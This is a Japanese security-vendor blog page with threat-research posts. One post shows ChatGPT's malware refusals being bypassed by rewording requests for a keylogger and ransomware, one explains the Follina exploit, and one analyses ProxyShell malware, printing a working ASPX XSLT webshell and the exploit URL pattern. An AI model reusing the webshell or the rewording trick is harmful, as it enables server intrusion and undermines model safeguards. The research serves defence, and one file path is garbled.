di_blog_post

Deep Instinct prevents more advanced threats than any EPP or EDR in the world.

Deep Instinct Blog: Breaking News and Updates

プラットフォームの概要

エンドポイント セキュリティ

エンドポイントの先にあるもの

製品

ランサムウェアの予防

ゼロデイ攻撃の防止

ファイルレス攻撃の阻止

EPPの有効性の向上

EDRでは不十分

ソリューション

サイバーセキュリティにおける深層学習

Deep Instinctのお客様

Deep Instinctが信頼される理由

Deep Instinctについて

採用

お問い合わせ

ニュース

会社概要

カタログ/資料

ブログ

デモ動画

トレーニング

リソース

資料請求/デモリクエスト

カスタマーポータル

インテグレーション/コンプライアンス

クイックリンク

アプリケーション向けの対策

+ Microsoft Defender

従来のAVを置き換える

カタログ・資料

オンラインセミナー

リーダーシップメンバー

ボードメンバー

国内販売代理店

パートナ

content_block

Perspective & Findings

ブログを読む

Emotetの休暇は終了：悪い奴は休まない

emotet-blog2.png

Listing preview

Perspective & Findings

Emotetの休暇は終了：悪い奴は休まない

image_media_card

新しいMuddy Waterの脅威：新しい泥水はさらに濁っている

死から蘇った、2022年のエモテット

The Re-Emergence of Emotet

EDR では不十分な８つの理由

マルウェアローダー「Bumblebee」の闇

Deep Instinct のトレンド

carousel_cards

listing_preview

Blog JP

chatgpt-malicious-wishes-blog.png

OpenAIの「ChatGPT」は、2022年11月のリリース以来、量子コンピュータの説明の仕方から誕生日の詩の書き方まで、あらゆることをチャットボットに聞けるようになり、人気を博しています。しかしサイバーセキュリティの観点では、ある大きな疑問があります。それは、ChatGPTが攻撃者にとって高度な攻撃を行い、それを加速させるためのツールになるのではないかという懸念です。以下の調査は、ChatGPTが悪用された場合、どれほど危険なものになるかを実証しています。また、リサーチャーがこのツールを使って攻撃を阻止したり、ソフトウェア開発者がコードを改善したりする可能性もあります。しかし、私たちは、AIがマルウェアを検知する方法よりも、マルウェアを作ることに長けていることを発見しました。多くの技術の進歩と共に、マルウェアの開発者は、ChatGPTを悪用してマルウェアを拡散する方法を発見しています。フィッシングメッセージ、情報漏洩、暗号化ソフトウェアなど、AIツールによって作成された悪意のあるコンテンツの例は、すべてオンラインで共有されています。OpenAIは、新しいツールの悪用を防ぐためにいくつかの対策を講じ、ユーザーが悪意あるコンテンツ/コードの作成を依頼したときに、ソフトウェアが認識できるような仕組みを実装しています。例えば、ChatGPTにランサムウェアの作成を依頼した場合、ソフトウェアは「盗む」「身代金」といったフラグ付きの単語をチェックし、それに従わないようにします。しかし、以下に示すように、これらの制御を突破する方法があります。それは、質問の仕方にあります。<h3>すべては言い方次第</h3>ChatGPTは、悪意のあるコードを提供することを避けようとします。下の画像は、私がこのソフトウェアにGoキーロガーの提供を依頼した際の返答です：<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="bltf04bbd046f350972" alt="図1: キーロガーの提供を拒否するChatGPTの返答" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltf04bbd046f350972/63c8427ae6cd4a7779d9f929/fig01-chatgpt-refused-to-provide-keylogger.png" /><figcaption style = "text-align: center;" style="text-align: center;">図1: キーロガーの提供を拒否するChatGPTの返答</figcaption></figure> しかし、私がリクエスト内容を言い直し、「キーロガー」という言葉を使わずに、どういうことをするプログラムが欲しいかを説明すると、私のリクエストは受理されました。 <figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt198cc2bb388f3945" alt="図2：Goキーロガーの入手に成功" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt198cc2bb388f3945/63c8427a1864e26d0032af7d/fig02-chatgpt-successfully-creating-go-keylogger.png" /><figcaption style = "text-align: center;" style="text-align: center;">図2：Goキーロガーの入手に成功</figcaption></figure><h3>AV回避を目指せ</h3>新しい子犬が他にどんな芸当ができるのか、またマルウェア対策ソリューションがどの程度対処できるのかを確認するために、私はより破壊的なマルウェアであるランサムウェアをAIにリクエストことにしました。当然のことながら、ランサムウェアをそのままリクエストすることはできず、以下のように、少し曖昧な表現でリクエストする必要がありました。<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="bltd641b177c5591cf9" alt="図3：Goランサムウェアの入手に成功" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltd641b177c5591cf9/63c8427a3431f93ff7f79ecc/fig03-chatgpt-successfully-creating-go-ransomware.png" /><figcaption style = "text-align: center;" style="text-align: center;">図3：Goランサムウェアの入手に成功</figcaption></figure> 上記の返信には、リクエストされたことをすべて実行するGoスクリプトが添付されていました。不足していた2つのインポートを追加し、デフォルトのAESキーと、ドロップされるテキストファイルのコンテンツとして使用されるデフォルトの文字列ChatGPTを変更するだけで、ランサムウェアの一部を動作させることができたのです。また、ボットのコメントも削除し、プログラムの検出をより困難にしました。そして、スクリプトをPE32ファイルとPE64ファイルにコンパイルし、問題なく実行できることを確認した後、VirusTotalにアップロードしてマルウェア対策ソリューションがどの程度対処できるかをチェックしました。その結果は驚くべきものでした。69のエンジンのうち4つだけがPE32を検出し、71のエンジンのうち2つだけがPE64バージョンを検知したのです。<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt41a233c745211f9b" alt="図4：VirusTotalにおけるPE32亜種の検知率" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt41a233c745211f9b/63c8427a83026010f1038cae/fig04-pe32-variant-detection-rate-on-virustotal.png" /><figcaption style = "text-align: center;" style="text-align: center;">図4：VirusTotalにおけるPE32亜種の検知率</figcaption></figure> <figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt1230d55deef0ef1d" alt="図5：VirusTotalにおけるPE64亜種の検知率" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt1230d55deef0ef1d/63c8427a08b84c3d9e4c9a63/fig05-pe64-variant-detection-rate-virustotal.png" /><figcaption style = "text-align: center;" style="text-align: center;">図5：VirusTotalにおけるPE64亜種の検知率</figcaption></figure> このファイルを作成するためにコンパイルされたスクリプトがGoで書かれていたため、ファイルが見逃された可能性があります。Goはまだ一般的とは言えない言語ですが、まさにこの理由からこの検知回避の研究に選ばれました。 もう一つの可能性は、対称型暗号化アルゴリズム（AES）を使用していて、最近のランサムウェアのようにリモートアドレスにファイルをアップロードせず、特定のファイルタイプの暗号化を避けることもしないというシンプルなランサムウェアであることが挙げられます。いずれにせよ、これはランサムウェアであり、ほとんどのマルウェア対策ソリューションが少なくとも静的に検出できないことは、ChatGPTが悪用された場合にいかに危険であるかを明確に示しています。<h3>設計上のバグ</h3>前述したように、Goランサムウェアを動作させるためには、いくつかのインポートを追加する必要がありました。ChatGPTにキーロガーの作成を依頼した際にも同様のことが起こり、以下の画像に見られるように、ある関数の実装を私に任せてしまいました。<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt747488b5780f7d87" alt="図6：ファイル転送の実装が省略されている" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt747488b5780f7d87/63c8427ae97936109ef2be6d/fig06-omitted-file-transfer-implementation.png" /><figcaption style = "text-align: center;" style="text-align: center;">図6：ファイル転送の実装が省略されている</figcaption></figure> 私は、これはバグではなく、AIソリューションが実際に動作するマルウェアの提供を回避するためのやり方ではないかと考えていました。ボットから受け取った下のメッセージは、私の推測をより確かなものにしました。 <figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt1ac3ef584c795933" alt="図7：メッセージの内容に関する情報" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt1ac3ef584c795933/63c8427ab2a32b3f99e44c16/fig07-information-about-message-content.png" /><figcaption style = "text-align: center;" style="text-align: center;">図7：メッセージの内容に関する情報</figcaption></figure> ご覧の通り、ChatGPTは提供されたランサムウェアのコードが実行できないことを認識しており、それを実行させるために必要なライブラリまで知っていました。これは、AIになぜこれらのライブラリを自分でインポートしなかったのかと尋ねた後に得られた答えと相まって、ボットが意図的に実行不可能なコードを提供したのだという確信を持ちました。<h3>ジキルとハイド</h3>ChatGPTはマルウェアの作成に利用されることもありますが、セキュリティ リサーチャーがマルウェアを防御するのにも利用されます。たとえば、さまざまな攻撃手法を検知するためのYARAルールを記述することなどが可能になるのです。下の画像は、MITRE ATT&CKのサブテクニックT1055.002（プロセスインジェクション）を検知するために作成されたYARAルールの例です。<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt9aff6f0361088df1" alt="図8：プロセスインジェクションを検出するYARAルール、このままでは誤検知しやすい" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt9aff6f0361088df1/63c8427a1327af10d8774158/fig08-yara-rule-to-detect-process-injection-prone-to-false-positives.png" /><figcaption style = "text-align: center;" style="text-align: center;">図8：プロセスインジェクションを検出するYARAルール、このままでは誤検知しやすい</figcaption></figure> このルールは一般的すぎて誤検出が多くなりそうなので、より具体的なルールをAIに求めたところ、以下のような回答が返ってきました。<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blte277265c707d0169" alt="図9：プロセスインジェクションを検出するYARAルール、見逃しが発生しやすい" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blte277265c707d0169/63c8427a7dbd6a1641ea2d84/fig09-make-above-yara-rule-less-prone-to-false-positives.png" /><figcaption style = "text-align: center;" style="text-align: center;">図9：プロセスインジェクションを検出するYARAルール、見逃しが発生しやすい</figcaption></figure> これだと誤検知は少なくなりますが、プロセスインジェクションを行うマルウェアを見逃すことが多くなります。いずれにせよ、私はボットが自身のルールを回避するコードを書くかどうかを確認したかったのですが、以下に示すように、ボットはいくつかの注意書きを付けた上で、リクエストを実行しました。<figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt96a5835ed986ed03" alt="図10：ChatGPTが自身のYARAルールによる検知を回避するマルウェアを書くことに同意している様子" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt96a5835ed986ed03/63c8427aca4ee4418bab9b69/fig10-chatgpt-agreement-to-write-malware-that-bypasses-its-own-yara-rule.png" /><figcaption style = "text-align: center;" style="text-align: center;">図10：ChatGPTが自身のYARAルールによる検知を回避するマルウェアを書くことに同意している様子</figcaption></figure>どうやらChatGPTは、マルウェアを書くのが上手すぎて、自作を検知できるYARAルールを書くことができず、代わりに誤検知しやすいルールを提供してしまったようです。結局のところ、AIソリューションは、マルウェアを検知する方法を提供するよりも、マルウェアを作成することに長けているようです。 <figure style = "margin: auto; text-align: center;width: autopx;"><img asset_uid="blt7f1475512190800e" alt="図11：ChatGPTが自作マルウェアを検出するYARAルールを書けない件" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt7f1475512190800e/63c842845156964aea434e3c/fig11-chatgpts-inability-to-write-yara-rule-to-detect-its-own-work.png" /><figcaption style = "text-align: center;" style="text-align: center;">図11：ChatGPTが自作マルウェアを検出するYARAルールを書けない件</figcaption></figure><h3>調査・分析ツールとしてのChatGPT</h3>多くの最新ツールと同様に、ChatGPTには、サードパーティアプリケーションがAIに問い合わせ、オンラインユーザーインターフェースの代わりにスクリプトを使用して返信を受け取ることを可能にするAPIがあります。このAPIを利用して、サイバーセキュリティ研究者の仕事を大幅に楽にするオープンソースの分析ツールを作成した個人もすでにいます。そのようなツールの顕著な例として、<a href="https://github.com/JusticeRage/Gepetto" target="_blank">Gepetto</a>と<a href="https://github.com/moyix/gpt-wpre" target="_blank">GPT-WPRE</a>があり、それぞれIDAとGhidraを使って逆コンパイルしたコードに意味のあるコメントを追加します。また、PEファイルからIAT（Import Address Table）の内容を抽出し、インポートされたライブラリを使用して実装できるMITRE ATT&CK技術に関する情報を追加するスクリプトである<a href="https://github.com/fr0gger/IATelligence" target="_blank">IATelligence</a>も有用なツールの1つです。これらは、ChatGPTが持つ解析ツールとしての可能性のほんの一例に過ぎず、アイデアと努力次第では、このAIはSIEMシステムに統合され、現在で優秀なアナリストが行っている作業の多くを代理で行うことさえ可能になるかもしれません。<h3>もつれあった未来</h3>ChatGPTは、マルウェアの実行方法を知らない日常生活者のために悪意のあるコードを構築することはありませんが、そのような人たちの攻撃を加速させる可能性はあります。ChatGPTは今後も対策を練っていくと思いますが、前述のように、求めている結果を得るための質問の仕方を変えるやり方も出てくるでしょう。AIを使ったソリューション全般の進歩と、ChatGPTが示した能力から、マルウェアの作成と検知の将来は、今後のAI分野の進歩と、その一般化に大きく影響されると思われます。私たちの見立てでは、脅威者はこれらのツールを自分たちに有利になるように活用する方法を見つけていき、サイバーセキュリティの専門家は（少なくとも現時点では）これらのツールの恩恵をあまり受けられずに、これらのツールを使って作成されたマルウェアを防御する新しい方法を見つけなければならなくなるでしょう。<h3>生成されたランサムウェアのハッシュ値 </h3>894853e4422fcc697ec25dc4a6132cda800f66cd77994c0d4918bb7dec33bad3 eddie4-32.exe bedcf4cf0e16da111220f5239b55960847d3893f13a6db6aa7f97ca01150fc77 eddie4-54.exe

ChatGPTとマルウェア：悪意のある願いが現実になる

zero-day-Unfolding-Follina-blog.png

ゼロデイ脆弱性は、その性質上、脅威リサーチャーやほとんどのセキュリティツールに検知されないため、防御が最も困難な脅威の一つです。これらの脆弱性が悪用された場合、脆弱性を特定し、脅威者が攻撃を開始するまでに穴を塞ぐことは、時間との戦いとなります。Follina脆弱性とは？2022年5月27日、サイバーセキュリティ・コミュニティは、「Follina」と名付けられたMicrosoft Support Diagnostic Tool（MSDT）の新しいゼロデイ脆弱性を認識し、後にCVE識別子 "CVE-2022-30190" が付与されました。Follinaは、コード実行を可能にするMSDTのバグに起因しています。特定の状況下では、攻撃者は、巧妙なMicrosoft Office文書またはRTF（Rich Text Format）ファイルを使って、被害者のマシン上でPowerShellコマンドを実行することができます。この記事では、エクスプロイトの詳細な説明、攻撃の結果についての議論、および組織が Follina 攻撃の犠牲になる可能性を低減する方法についての助言を提供する予定です。Follinaとマイクロソフト診断ツールこのエクスプロイトを理解するためには、まずMSDTの問題を理解する必要があります。通常、MSDTが呼び出されると、トラブルシューティングの段階に進むために、サポート専門家が提供するパスキーを要求されます。<figure style = "float: none;width: autopx;max-width:auto;"><img asset_uid="blte55e44b00d8ee87a" alt="パスキー要求の例" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blte55e44b00d8ee87a/62a221a4a9454a5197097b01/msdt_passkey_demand.png" /><figcaption >パスキー要求の例</figcaption></figure>これは、あるレベルのセキュリティを提供し、トラブルシューティングユーティリティの機能へのアクセスを制限するはずです。しかし、特定の条件下で特定の構文を使用すると、パスキーを提供せずに MSDT を介して PowerShell コマンドを実行することが可能です。

Follinaの悪用このバグを利用するには、攻撃者は「ms-msdt」を使用してトラブルシューティングウィザードを呼び出すHTMLファイルを作成し、次の例のように、コマンドに特定のパラメータを追加してPowerShellコードを実行させることができます。<img src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltcbc57b67c1ab4913/63345d79961acb239b3df33f/script-code-snippet-1.png" height="auto"/>この方法は、バイナリの実行にも使用されます：<img src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltda4bd4c0bbd0fe71/63345d79a2ca982a1c795093/script-code-snippet-2.png" height="auto"/>

この方法によって、攻撃者はランサムウェアの実行から、リバースシェルを開きそこから被害者のマシン上で無制限のコマンドを実行することまで、さまざまな活動が可能になります。攻撃シナリオは、事実上、無限にあります。ただし、この方法は、HTMLファイルのサイズが少なくとも4096バイトである場合にのみ有効で、これはファイルに大量のコメントを追加することで容易に実現できます。攻撃者はどのようにマイクロソフトを利用してFollinaを配信するのでしょうか？攻撃者は、悪意のあるHTMLファイルがホストされているアドレスに誰かがアクセスすることを、ただ指をくわえてぼんやりと待っているわけではありません。そこで、マイクロソフトのOffice文書とRTFファイルが活躍するのです。このブログで説明したように、脅威者は、Microsoft Office Open XML（OOXML）ファイルの関係ファイル（RELS）を変更することで、Microsoft Office文書がインターネット上でホストされているHTMLファイルを開き、スクリプトが含まれていればそれをユーザに見せることなく実行させることができます。このような文書があれば、攻撃者は、例えば電子メールの添付ファイルとして、不審なユーザーにファイルを送り、クリックするように説得することができます。このアクションが実行されると、MSDTが呼び出され、悪意のある行為者のコマンドが実行されることになります。さらに、攻撃者が最初のアクセスポイントとして、Microsoft Office文書ではなくRTFファイルを選択した場合、事態はさらに恐ろしいものになります。このシナリオでは、ユーザーがファイルにカーソルを合わせただけでも感染する可能性があり、ファイルを開かなくても感染を開始することができます。Follinaはどのように実行されるのでしょうか？MSDTを介して実行されるコードは、おそらくユーザーには見えないとしても、攻撃者はトラブルシューター自体の実行を隠すことはできません。「ms-msdt」が呼び出されると、トラブルシューティングウィザードのウィンドウが表示され、問題の検知に取り組んでいることがユーザーに通知されます。もちろん、これは、現在コンピュータ上でマルウェアが実行されているというユーザーを不安にさせるような警告ではありません。Follinaに慣れていない人にとっては、特に過去に同様のトラブルシューターに遭遇したことがある場合、これは比較的無害なものと考えてしまうでしょう。しかし、Follinaのことを聞いたことがある人にとっては、これはすぐに赤信号のサインです。<img asset_uid="blt746c96d092ceb1f7" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt746c96d092ceb1f7/62a2501205f1d157f3a892e7/msdt_detecting_issues.png" height="auto"/>Deep Instinctのゼロデイ検知・防止機能本稿執筆時点では、マイクロソフトは「CVE-2022-30190」に対するパッチを発行しておらず、MSDT URLプロトコルを無効にするようユーザに助言するにとどめています。Deep Instinctは、Follinaやその他のゼロデイ脅威を、実行前に防止します。Deep Instinctは、悪意のあるファイルの実行を防ぐためにディープラーニングモデルを使用し、既知、未知、ゼロデイ脅威を20ミリ秒未満で予測・防止します。これは、ランサムウェアが暗号化できる最速よりも750倍速いスピードです。ディープラーニングによる予防第一のアプローチにより、最も高度な脅威であっても99%以上のゼロデイ精度で検知・防御することが可能です。マルウェア、ランサムウェア、ゼロデイ対策についてもっと知りたい方には、製品のデモンストレーションも実施しております。<figure style = "float: none;width: autopx;max-width:auto;"><img asset_uid="blt1522c89054ccb4a5" alt="Follinaを利用して悪意のあるコマンドを実行するRTFファイルは、実行される前にDeep Instinctエージェントによって阻止されます。" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt1522c89054ccb4a5/62a221a44a98d755621a2783/static_prevention.png" /><figcaption >Follinaを利用して悪意のあるコマンドを実行するRTFファイルは、実行される前にDeep Instinctエージェントによって阻止されます。</figcaption></figure><figure style = "float: none;width: autopx;max-width:auto;"><img asset_uid="bltd1d882404759bae7" alt="Follinaを利用してHTMLファイルをMSDTで実行しようとしても、悪意のあるPowerShellコードが実行されるのを防ぎます。" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltd1d882404759bae7/62a221a41da2265851294c6b/dynamic_prevention.png" /><figcaption >Follinaを利用してHTMLファイルをMSDTで実行しようとしても、悪意のあるPowerShellコードが実行されるのを防ぎます。</figcaption></figure>参考文献<ul><li><a href="/blog/how-your-regular-microsoft-office-file-is-open-to-manipulation" target="_self" isblock="true">https://www.deepinstinct.com/blog/how-your-regular-microsoft-office-file-is-open-to-manipulation</a></li><li><a href="/blog/zero-day-vulnerability-what-it-is-and-how-it-works" target="_self" isblock="true">https://www.deepinstinct.com/blog/zero-day-vulnerability-what-it-is-and-how-it-works</a></li><li><a href="/blog/hafnium-leveraging-multiple-zero-days-to-attack-microsoft-exchange" target="_self" isblock="true">https://www.deepinstinct.com/blog/hafnium-leveraging-multiple-zero-days-to-attack-microsoft-exchange</a></li></ul>

ゼロデイ脆弱性「Follina」の解説

dropper-microsoft.png

Emotetの検知回避手法を解説：Microsoft Officeにおける4種類のドロッパー マルウェアとメッセージボックスの悪用

ProxyShell-Malware.png

マルウェア「Exchange ProxyShell」の解析結果について
最近、脅威研究者は、Microsoft ExchangeのProxyShellに新たな脆弱性を発見しました。この脆弱性により、攻撃者はリモートコードの実行機能を獲得することができます。これらの脆弱性は、技術的な詳細が公表される前にマイクロソフトに開示され、ほとんどのパッチが適用されていましたが、多くのExchangeサーバにはパッチが適用されないまま放置されており、その後侵害が発生しています。

Microsoft Exchangeの悪用は継続的な問題であり、これらの脆弱性を悪用してExchangeサーバ上での持続性を獲得する新たな脅威が数多く見られます。最近、お客様の環境でMicrosoft Exchangeを悪用するように設計されたマルウェアを発見しました。他の既知および未知のマルウェアと同様に、Deep Instinctは、それが実行されて問題が発生する前に防止しました。
しかし、このマルウェアは非常に興味深く、より深い調査が必要なほどでした。以下は、我々の分析結果です。

ProxyShellに潜む脆弱性
調査を開始する前に、まずProxyShellについて説明します。

ProxyShellは、3つの脆弱性で構成されており、これらの脆弱性を組み合わせることで、攻撃者は認証を必要とせずにMicrosoft Exchangeサーバ上で任意のコマンドを実行することが可能になります。ProxyShellは、認証を必要としないアクセスを可能にするため、攻撃者が標的とする環境へのアクセスを容易にしてしまうため、特に危険な攻撃手段です。
1つ目のProxyShellの脆弱性であるCVE-2021-34473は、マイクロソフトのExplicit Loginメカニズムに存在し、この形式のURLのEmailフィールドに「Autodiscover/Autodiscover.json」という文字列を渡すだけで、脅威行為者が任意のバックエンドURLにNT Authority/Systemとしてインターフェイスすることができます:

https://exchange/autodiscover/autodiscover.json?@mycorp.com/?Email=autodiscover/autodiscover.json%3f@mycorp.com

しかし、システムユーザーが電子メールアカウントを持っていないため、このアクションだけでは実際のコマンドを実行することはできません。メールボックス関連の管理活動を支援するために設計された組み込み機能であるExchange PowerShell Remotingを使用するには、電子メールアカウントへのアクセスが必要です。この問題を解決するには、PowerShell の脆弱性 CVE-2021-34523 を利用して、自分自身を管理者にダウングレードします。

次に、攻撃者はサーバー上でコマンドを実行して永続的なアクセス権を獲得し、将来的に追加のマルウェアを展開できるようにします。そのためには、ファイルにバックドアを書き込む必要がありますが、これはCVE-2021-31207の脆弱性を利用することで実現できます。

The Little .NET that Tried: ProxyShellマルウェアの分析
このマルウェアは、顧客のExchangeサーバーにASPXウェブシェルを展開し、将来的に追加のマルウェアを展開できるように設計されていました。問題のマルウェアは.NETのサンプルで、DNSpyやその他の.NET逆アセンブラを使って簡単に解析することができました。

このマルウェアの目的は、Exchangeサーバ上にASPXのWebシェルを落とし、Webからアクセスできるように仮想ディレクトリを作成し、ドメイン内の他のすべてのExchangeサーバからシェルにアクセスできるようにすることです。この実行ファイルは2つの追加PEを使用しており、Base64でエンコードされた文字列としてコードに格納され、メインの実行ファイルからファイルレスで呼び出されます。これらはメモリにロードされるため、マルウェア対策製品が攻撃を検知することが難しくなります。

Embedded PE #1 —“DropHell”

変数 "rawAssembly "に保存されている最初のエンコードされたPEは、シェルをASPXファイルとしてドロップし、仮想ディレクトリを作成する役割を担っている。メインの実行ファイルは、そのメソッドの一つである "DropHell "を以下のコマンドで呼び出す。

<img data-image="ug8zc68wv063" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt002a109cf5ffb842/6183416871dc1b799a73fec9/image.png" data-sys-asset-uid="blt002a109cf5ffb842" alt="image.png">
図1："DropHell "メソッドの呼び出し

変数「array」には、Basea64でエンコードされたC#のウェブシェル、"shAGEu.aspx "が格納されています。これは、格納するASPXファイルの名前と、物理パスと仮想パスで使用するフォルダの名前を表しています。
<img data-image="bi2nvi2dlj72" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt9671a0a563071a1d/61834180b23afd58601069d4/image.png" data-sys-asset-uid="blt9671a0a563071a1d" alt="image.png">
図2：変数「folderPath」と「array」について

「DropHell」メソッドは、Base64エンコードされたウェブシェルをデコードし、「C:\ProgramData\ZING\pdILh\shAGEu.aspx」に書き込み（「ZING」と「pdILh」のフォルダが作成されます）、「C:\ProgramData\ZING\pdILh」を指す仮想ディレクトリ「/auth/笔/pdILh」を作成します。 この「C:˶ˆ꒳ˆ˵」というパスは、Huntress氏が行ったProxyShellのサンプル解析などでも確認されています。

ASPXファイルが「ProgramData」ディレクトリの下に存在することは珍しく、そのため攻撃者は、不審な活動を監視する頻度が高いASPディレクトリの外にシェルを落とすことにしたのでしょう。
<img data-image="ecs8e7zk761h" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltbc2a65f99d4a5e60/618341927a22505a5c2541b9/image.png" data-sys-asset-uid="bltbc2a65f99d4a5e60" alt="image.png">
図3：仮想ディレクトリの作成

バックドアが作成されると、スクリプトはZINGとそのコンテンツを読み取り専用の隠しシステムアーティファクトとし、ウェブシェルの読み取りと実行以外にユーザーがファイルに対してほとんど何もできないようにするアクセスルールを追加することで、バックドアを保護します。
<img data-image="y8ciaoo70fa5" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt2b7c45205d599048/618341d2666f1777c9bcec06/image.png" data-sys-asset-uid="blt2b7c45205d599048" alt="image.png">
 図4：作成したファイルを保護するためのセキュリティ·ルールの追加

さらに、このマルウェアは、マイクロソフト社の「icacls」「NT Service\TrustedInstaller」を「C:\ProgramData\ZING\pdILh」とその中にあるすべてのものの所有者として使用し、そのコンテンツへの完全なSYSTEMアクセスを許可しています。これが完了すると、制御はメインの実行ファイルに戻り、すべてが計画通りに進んだかどうか、返された値を確認します。そして、"rawAssembly2 "という変数に格納されているbase64エンコードされた2つ目のPEの "Run "コマンドを呼び出します。
<img data-image="1x247ewv6cxx" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltf58fdde8981ccec9/618342036676ac790d1b8d59/image.png" data-sys-asset-uid="bltf58fdde8981ccec9" alt="image.png">

 図5: "Run "メソッドの呼び出し

Embedded PE #2 —　シェルの拡散 

このPEの目的は、バックドアをドメイン内で見つけられる限り多くのExchangeサーバーに広めることである。

まず、LDAPを使って "Exchange servers "グループを探し、追加のExchangeサーバーを見つけます。 <img data-image="cw0wxhbgtdas" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt293c4fe1030284b2/61834249898f1d7860f28628/image.png" data-sys-asset-uid="blt293c4fe1030284b2" alt="image.png">
図 6：Exchange サーバーの検索

この試みで何も得られなかった場合は、Exchange 関連サービスの「sAMAccountName」値の検索を試みます。<img data-image="typ8eopkat4f" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/bltb9c7d58ba6a5eca2/6183425dc9714c667b4fe9a7/image.png" data-sys-asset-uid="bltb9c7d58ba6a5eca2" alt="image.png">


図 7：Exchange 関連サービスのプリンシパル名検索

そして、検出された各サーバー上に、以前に作成された「C:ProgramData\ZING\pdILh」ディレクトリを指す仮想ディレクトリを作成します（すべてのサーバーは、最初に感染したマシン上のまったく同じディレクトリを指しています）。
<img data-image="jn53zwa7vztw" src="https://images.contentstack.io/v3/assets/blt1ec077b6b53d6b3e/blt6f4863afe1c2452e/6183426794e50d5a63800fcb/image.png" data-sys-asset-uid="blt6f4863afe1c2452e" alt="image.png">
図 8: 追加の Exchange サーバ上にバックドアへの仮想パスを作成する

これで攻撃は終了です。

バックドア

落とされたASPXファイルには以下のC#コードが含まれており、単純にXSL変換のウェブシェルを作成しています。

&lt;%@ Page Language="C#" %&gt;&lt;%
var GkggV=new System.Xml.XmlDocument();
GkggV.LoadXml(@"&lt;root&gt;1&lt;/root&gt;");
var Nlcch=new System.Xml.XmlDocument();
Nlcch.LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request["Redacted"]))); 
var DzYqa=new System.Xml.Xsl.XslCompiledTransform();
DzYqa.Load(Nlcch,System.Xml.Xsl.XsltSettings.TrustedXslt,new System.Xml.XmlUrlResolver());
DzYqa.Transform(GkggV,null,new System.IO.MemoryStream());


まとめ
Exchange サーバ上に Web シェルを持つことは、特に熟練した攻撃者の手にかかると非常に危険です。ProxyShellの脆弱性は、過去数ヶ月の間に数多くのバックドアをインストールするために使用されてきました。これらのドアから入ってきたゲストはどれも歓迎されるものではありませんでしたが、中にはホストに悪い印象を与えるものもありました（詳細はLockFileランサムウェアがその典型例です）。
幸いなことに、Deep Instinctはこのような性質の攻撃を防ぐことに成功しており、お客様の環境に侵入する前に検出して阻止することができます。Deep Instinctは、悪用される展開方法にかかわらず、悪意のあるペイロードを防止します。悪意のあるペイロードは、メモリ内にシェルコードを注入または実行しようとした場合でも、実行前に阻止されます。当社の深層学習フレームワークにより、Deep Instinctは未知の脅威の99%以上を防ぐことができます。また、誤検知を0.1%未満に抑えるという驚異的な精度も実現しています。

パッチの適用は重要ですが、Deep Instinctは未知の脅威を防ぐために存在します。他の人には見えないセキュリティリスクを予測し、脅威が実行される前に20ms以下で防ぐことができます。

当社のマルウェア、ランサムウェア、ゼロデイの防止機能についての詳細をお知りになりたい方は、こちらからお申し込みください。
<a href="https://www.deepinstinct.com/ja/request-a-demo">https://www.deepinstinct.com/ja/request-a-demo</a>

IoC情報

SHA256 Values

742fd14cd1d53e3bd7a38e7f90956b3dc4185c2a31fccd0afc673cb98bbbefe6- the main executable

8f5156a457e287c2c60239d243fa8781fedb69b85b86f15e04b43b96abc53bc4- embedded PE #1 (“DropHell”)

eb17d105dd5132ada75485963e6dbb344b0fe3109a9a583cebc0bf1795352185- embedded PE #2 

1f6aa7ddfc249e7a7f4c9fa2dadee249009f4d20676c3c09effe23dbe81c3be3- the ASPX webshell file

ファイル名とパス
shAGEu.aspx

C:\ProgramData\ZING

pdILh

“/auth/笔/pdILh (virtual path)

Exchangeユーザーは要注意！シェルが動いています

IMG_0478.jpeg

